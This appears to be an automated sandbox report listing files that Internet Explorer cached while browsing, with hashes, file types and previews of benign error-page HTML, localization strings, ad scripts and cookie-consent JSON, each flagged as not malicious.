                                        Preview: ..<script id="sam-metadata" type="text/html" data-json="{&quot;optout&quot;:{&quot;msaOptOut&quot;:false,&quot;browserOptOut&quot;:false},&quot;taboola&quot;:{&quot;sessionId&quot;:&quot;v2_5c5e93a0867973a40f977e8272da4cb7_bcba8ecb-5556-45fe-9da3-762342360bf7-tuct834abf9_1631266425_1631266425_CIi3jgYQr4c_GKfavNqZ3eLcBSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAXAA&quot;},&quot;tbsessionid&quot;:&quot;v2_5c5e93a0867973a40f977e8272da4cb7_bcba8ecb-5556-45fe-9da3-762342360bf7-tuct834abf9_1631266425_1631266425_CIi3jgYQr4c_GKfavNqZ3eLcBSABKAEwKziy0A1A0IgQSN7Y2QNQ____________AVgAYABoopyqvanCqcmOAXAA&quot;,&quot;pageViewId&quot;:&quot;f874d0463d1c4bd8a6f098442a1996cd&quot;,&quot;RequestLevelBeaconUrls&quot;:[]}">..</script>....<li class="single serversidenativead hasimage " data-json="{&quot;tvb&quot;:[],&quot;trb&quot;:[],&quot;tjb&quot;:[],&quot;p&quot;:&quot;gemini&quot;,&quot;e&quot;:true}" data-provider="gemini" data-ad-region="infopane" data-ad-index="13" data-viewability
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\dnserror[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):2997
                                        Entropy (8bit):4.4885437940628465
                                        Encrypted:false
                                        SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                        MD5:2DC61EB461DA1436F5D22BCE51425660
                                        SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                        SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                        SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\down[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\down[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):748
                                        Entropy (8bit):7.249606135668305
                                        Encrypted:false
                                        SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                        MD5:C4F558C4C8B56858F15C09037CD6625A
                                        SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                        SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                        SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\e151e5[2].gif
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 1 x 1
                                        Category:dropped
                                        Size (bytes):43
                                        Entropy (8bit):3.122191481864228
                                        Encrypted:false
                                        SSDEEP:3:CUTxls/1h/:7lU/
                                        MD5:F8614595FBA50D96389708A4135776E4
                                        SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                        SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                        SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\errorPageStrings[1]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\errorPageStrings[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):4720
                                        Entropy (8bit):5.164796203267696
                                        Encrypted:false
                                        SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                        MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                        SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                        SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                        SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\httpErrorPagesScripts[2]
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):12105
                                        Entropy (8bit):5.451485481468043
                                        Encrypted:false
                                        SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                        MD5:9234071287E637F85D721463C488704C
                                        SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                        SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                        SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NUEPGTR9\nrrV27452[1].js
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):90611
                                        Entropy (8bit):5.421500848741912
                                        Encrypted:false
                                        SSDEEP:1536:uEuukXGs7RiUGZFVgRdillux5Q3Yzudp9o9uvby3TdXPH6viqQDkjs2i:atiX0di3p8urMfHgjg
                                        MD5:1EB648466B92897E80D5F3A64D02C011
                                        SHA1:624EE532FED7CCBC60DF3433DC3369AADE0F9226
                                        SHA-256:1C9605652D3D876ACA145E7F46F92E669E6A92C4AB27A1CBB454882BD58A1386
                                        SHA-512:1B7CEED799A6994991DCB8938A3B00BD64E1CEC17EC0775FC1CE844604805FEB20BEC3D72823730712BD0CB45B278F30FDD2CBA7319AD605323F667F39BF801C
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: var _mNRequire,_mNDefine;!function(){"use strict";var c={},u={};function a(e){return"function"==typeof e}_mNRequire=function e(t,r){var n,i,o=[];for(i in t)t.hasOwnProperty(i)&&("object"!=typeof(n=t[i])&&void 0!==n?(void 0!==c[n]||(c[n]=e(u[n].deps,u[n].callback)),o.push(c[n])):o.push(n));return a(r)?r.apply(this,o):o},_mNDefine=function(e,t,r){if(a(t)&&(r=t,t=[]),void 0===(n=e)||""===n||null===n||(n=t,"[object Array]"!==Object.prototype.toString.call(n))||!a(r))return!1;var n;u[e]={deps:t,callback:r}}}();_mNDefine("modulefactory",[],function(){"use strict";var r={},e={},o={},i={},t={},n={},a={},d={},c={},l={};function g(r){var e=!0,o={};try{o=_mNRequire([r])[0]}catch(r){e=!1}return o.isResolved=function(){return e},o}return r=g("conversionpixelcontroller"),e=g("browserhinter"),o=g("kwdClickTargetModifier"),i=g("hover"),t=g("mraidDelayedLogging"),n=g("macrokeywords"),a=g("tcfdatamanager"),d=g("l3-reporting-observer-adapter"),c=g("editorial_blocking"),l=g("debuglogs"),{conversionPixelCo
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\1621266752856-586[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):195845
                                        Entropy (8bit):7.986893102264154
                                        Encrypted:false
                                        SSDEEP:3072:oTDjJlV5z0VKP9Wue3nJSnMZ+jVguSAFfdrEuQ3T/ixIBIvRNzWdqx6:o3jJl7Qg9Wuznd+uRXrEuQD/Abidqx6
                                        MD5:441833DE41DFE8D94AC6F8CE4E751EBA
                                        SHA1:0B498BD07F3146008C101714D95A3DD0284F8D85
                                        SHA-256:73C3655356EB29B6DB5B64F7C8E6AEBD1F94A20108AECAB1B26E6A32F205ADEA
                                        SHA-512:FF6D451DCF8F2DA27AD78E9B89BC6A690FE0D0F61B2A251765CEEC6F69D95C291DB8E6C54D27729B25A2FDF2073F7B48558789FFF073C7F5CA28E5BA3E9C6D33
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\55a804ab-e5c6-4b97-9319-86263d365d28[1].json
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:ASCII text, with very long lines, with no line terminators
                                        Category:dropped
                                        Size (bytes):2955
                                        Entropy (8bit):4.796538193381466
                                        Encrypted:false
                                        SSDEEP:48:Y9vlgmDHF6Bjb40UMRBrvdiZv5Gh8aZa6AyYAmHHPk5JKIcFerZjSaSZjfumjVT4:OymDwb40zrvdip5GHZa6AyQshjUjVjx4
                                        MD5:8FCB3F61085635194CE5A73516DE39F9
                                        SHA1:4EF7BB8362EE512BD497C48C168085738EE010C3
                                        SHA-256:CEC95B7811CBF927FD338529A08F6B1BBF12F5B78459D07D15DE92C60C12DD64
                                        SHA-512:DB60AF665E02724F527C6781396105C456E56D23691A64F57BDD452C0568EF43DE36F63D8B18702A5C5A6FA29C9C16CD6ADEBB74E28BA94AF7291EAC3095861D
                                        Malicious:false
                                        Reputation:unknown
                                        Preview: {"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"LOCAL","Version":"6.4.0","OptanonDataJSON":"55a804ab-e5c6-4b97-9319-86263d365d28","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"6f0cca92-2dda-4588-a757-0e009f333603","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","bs","sd","bt","sg","bv","sh","bw","by","sj","bz","sl","sn","so","ca","sr","ss","cc","st","cd","sv","cf","cg","sx","ch","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","tg","cv","th","cw","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","dm","do","ua","ug","dz","um","us","ec","eg","eh","uy","uz","va","er","vc","et","ve","vg","vi","vn","vu","fj","fk","fm","fo","wf","ga","ws","gd","ge","gg","gh
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AANuZgF[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):750
                                        Entropy (8bit):7.653501615166515
                                        Encrypted:false
                                        SSDEEP:12:6v/7Wrv0Y7COhH4wY2zKLlJsmUhrpB02KYMYv7LLMVjcS0mNUfozbbj3rtpQd3HO:xrcYOEV3KLXfIB9MYjHMVl0mKozbH3hv
                                        MD5:93D77F5C5FFACEBA12A1ABFC6190B947
                                        SHA1:8001474A7342EBF760C66F1C30E48E32E00F2AF3
                                        SHA-256:E6DA934C90931C6089ADB3D213DDD70C7104D0A182A98AB1C663CEDAE37F83A1
                                        SHA-512:D5F874DF89D82CC819B7D591766300FC701F0E1FFC6055D4CC4BA55F10674F88EDDA565EB1FA57886AC16A57926EBBBC9A108D45D057D76B904383247CE7EA50
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgI04[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x250, frames 3
                                        Category:dropped
                                        Size (bytes):18270
                                        Entropy (8bit):7.9654930351531235
                                        Encrypted:false
                                        SSDEEP:384:+9YbKbipKBt5GG2Ggs8ARclXpMoPr/ndxiX8olNEH+pDBiDxo:+9YpaGG2A8ARg/PrnKX/lrpDBiDa
                                        MD5:6B3564FF9F6056768A8036657B2E0DAC
                                        SHA1:6E4BFC3BEE740EC8772B95C0A799619D5A182E6E
                                        SHA-256:5B9103D8CE4F9CA2DCAC9F39C48B1920A26878EC03FF50D0E295D5AED0EE8DAE
                                        SHA-512:D6649872B44DD18F2EC79287CEB8A5F755608C0F75553DBE7BA4EBFE477F3A5583C1EA6D23080E18439011DBBAA78D5600E30CAE1C5E13191D5B25AE19CAAFE9
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgJnJ[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):11532
                                        Entropy (8bit):7.851516433481847
                                        Encrypted:false
                                        SSDEEP:192:Q2JEDuAiMDafoxvWYzzawyHZvxczunLlArDYUbG272hGfc9wBuKEPlxP:NJLAgT8AZWzuLleYr3GfcfK4lxP
                                        MD5:583AD5872841584F57A8D272DBEF1F75
                                        SHA1:7DCEA6EC88FC3091D5F9B6591C461ED9412307B3
                                        SHA-256:DA23C9C4E4ACB95DB36BFF69DEEDF8152B63A84E932D3B17DC63B2D01B885765
                                        SHA-512:709ABC7640C2D509E36B9A428DB8B3DE2247A64AD0AA06704865343046C4A0309C6E4B9808274DDD84911D0B3FC2ACCAF3E7892A224E348D027AF88A99F08F97
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgjXB[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                        Category:dropped
                                        Size (bytes):7496
                                        Entropy (8bit):7.872783514358589
                                        Encrypted:false
                                        SSDEEP:192:Qn4PY809lw6ix9juWbyzWHyqQVnqWHLtYJ1xkl6d:0ovVxwWbryqQVnqWHG1H
                                        MD5:60C730BB16740319B2A30E9F11BE67E0
                                        SHA1:74B35979046B1B152F7A9877CAD81CC64E120C0A
                                        SHA-256:CC70CEABB3BE619DD85D82AEA0D3294FDD96093D467B394FE17FE4761E013721
                                        SHA-512:5C3682AF6548F8E2355AEF64D4F9DB864DE73BCD0331AFAFCFC4B5EE4B0B2A5BBBC806DAAC80F10667E97CE7FA9807076E769870310C19ADE9ED5BDA75E920CD
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgpXv[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                        Category:dropped
                                        Size (bytes):15626
                                        Entropy (8bit):7.962500897509523
                                        Encrypted:false
                                        SSDEEP:384:0JDz3LK/RAsFLqnDKf9aQI7LxXXylceAwl:0JDrLK/RAsF+nGf9aQOtXy7fl
                                        MD5:A52E535F3BC8BC8042A2DA850FA5EAF9
                                        SHA1:A921CB4EB83506A6E60D30F4DEB835DCA3EA6DEC
                                        SHA-256:AAE858FFA5F17507E49190460F62FF561C3EE8798A51464456F4B189DE6834BE
                                        SHA-512:06B934D9CF90F57875F4345F35DD7FF2B344F1C1DB531DA8747F271D185EFF6973B97DBAB20F3755B33E6BFE242198071DC179D0855946218FFDE4FF7CA4ED45
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgs0a[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):13020
                                        Entropy (8bit):7.879416972104943
                                        Encrypted:false
                                        SSDEEP:384:N3pY6zGTzlrB4GOhxp1FCoQINdi52hZl+uuZj3os:N3pshEDpfChgi5YJGF
                                        MD5:3A0523D4AD4D5B3845A7FD0680E9288B
                                        SHA1:3510C6877C97E5B21141D3AD7DDD46F05E365054
                                        SHA-256:CE5C0C7C063D0C19DC10A6D8ACDFCCAB2623AB8A889147C11757BDA8A04E514F
                                        SHA-512:EE5922D8E1A257FD3504FEC129EA8CCA2CEFDE2798F5B2638045BBB4DF6671DEE93361A9773F59FC29B0DC534BC78762211BFB1758C8B3E8E16ED31FF7A0D4CD
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgsFa[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                        Category:dropped
                                        Size (bytes):1980
                                        Entropy (8bit):7.722254195309331
                                        Encrypted:false
                                        SSDEEP:48:QfAuETAzZnh/4wm26epq61IlPUSw+wY6GBV/EohMAsHPJ:Qf7EOFbmpeVgwM6OKvJ
                                        MD5:EFD2E952BEDD592AABB3A0B3766CE388
                                        SHA1:9F866C37AC1F904BEC9521FE2F3F45A592ABCCAD
                                        SHA-256:2A51739796CCA7D48ED39A1152A0C2FBFF0FEC599D3788B8FD44D0DD1801333E
                                        SHA-512:E84BAEC627181E4C87363B5414C7E975A0E95D8FA8E0C12DE43E3F204D3BD71D18094F4238C3A833FAC04B33E6BD176D8D1D24ABCA689B1C0EADBD8590FE39F0
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgumt[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                        Category:dropped
                                        Size (bytes):12102
                                        Entropy (8bit):7.83903065961955
                                        Encrypted:false
                                        SSDEEP:192:Q259xLWdPUGydsUzuizxcSo5s3N3QStlw12PJd0dymT+QMe3RmFM1iCXJsR2:N7xEPUGgzuizxAs3NAStuwJmsm6Q6F2
                                        MD5:6C482BFC9BCC034E5552DAF300C6433B
                                        SHA1:8D06F42B3A9D940A2D52CDD464EC2E66649802C5
                                        SHA-256:A5A1B76BF9BAE3CA8B2B5D8EDFA17EC093979C33AEC7FBF4E356803C891762D9
                                        SHA-512:6808BD613190107D795D016200C0186650CF51AFC5BE84F8FD05219810B817406EDD6D9CF9F6BA6F6C2D6F6F33069A09B4464CFC1401739E1F5E69B0648FDCE7
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\AAOgzH6[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):17001
                                        Entropy (8bit):7.557235539199786
                                        Encrypted:false
                                        SSDEEP:384:IA8xSo7+zIo4rNZQQ4svcGancTZ0KIlBz0IjmOk+lduu/6xIL:IjEUogv4svcbcToN0+Xuuay
                                        MD5:EAECF54AA2CDC33FC2D7238560F601AE
                                        SHA1:1E25B64DA671A1DBEA98643F2357BD04761820D9
                                        SHA-256:B35091DD6B77688B9E49CDD17A2F196E864624B39D2EBB95B63DE927F69B07CD
                                        SHA-512:43C47B5BB9E8339EB207239C3338A6C1E259711F52CDB7852CD3CE657F0A4B2BC2D2583A2C07409208F5959AAE6A7439D00700AE9F8FB3C0C5B2F1FE2D561637
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB10MkbM[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):936
                                        Entropy (8bit):7.711185429072882
                                        Encrypted:false
                                        SSDEEP:24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
                                        MD5:19B9391F3CA20AA5671834C668105A22
                                        SHA1:81C2522FC7C808683191D2469426DFC06100F574
                                        SHA-256:3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
                                        SHA-512:0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB14hq0P[1].jpg
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                        Category:dropped
                                        Size (bytes):19135
                                        Entropy (8bit):7.696449301996147
                                        Encrypted:false
                                        SSDEEP:384:IHtFIzAsGkT2tP9ah048vTWjczBRfCghSyOaWLxyAy3FN5GU643lb1y6N0:INFIFTsEG46SjcbmaWLsR3FNY/Ayz
                                        MD5:01269B6BB16F7D4753894C9DC4E35D8C
                                        SHA1:B3EBFE430E1BBC0C951F6B7FB5662FEB69F53DEE
                                        SHA-256:D3E92DB7FBE8DF1B9EA32892AD81853065AD2A68C80C50FB335363A5F24D227D
                                        SHA-512:0AF92FBC8D3E06C3F82C6BA1DE0652706CA977ED10EEB664AE49DD4ADA3063119D194146F2B6D643F633D48AE7A841A14751F56CC41755B813B9C4A33B82E45C
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BB1cEP3G[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                        Category:dropped
                                        Size (bytes):1088
                                        Entropy (8bit):7.81915680849984
                                        Encrypted:false
                                        SSDEEP:24:FCGPRm4XxHvhNBb6W3bc763IU6+peaq90IUkiRPfoc:/pXBvkW3bc7k1FqWIUkSfB
                                        MD5:24F1589A12D948B741C2E5A0C4F19C2A
                                        SHA1:DC9BB00C5D063F25216CDABB77F5F01EA9F88325
                                        SHA-256:619910A3140A45391D7D3CB50EC4B48F0B0C8A76DC029576127648C4BD4B128C
                                        SHA-512:5D7A17B05E1FD1BC02823EC2719D30BC27A9FA03BCFFE30F3419990E440845842F18797C9071C037417776641AB2CDB86F1F6CD790D70481B3F863451D3249EE
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\BBPfCZL[1].png
                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        File Type:GIF image data, version 89a, 50 x 50
                                        Category:dropped
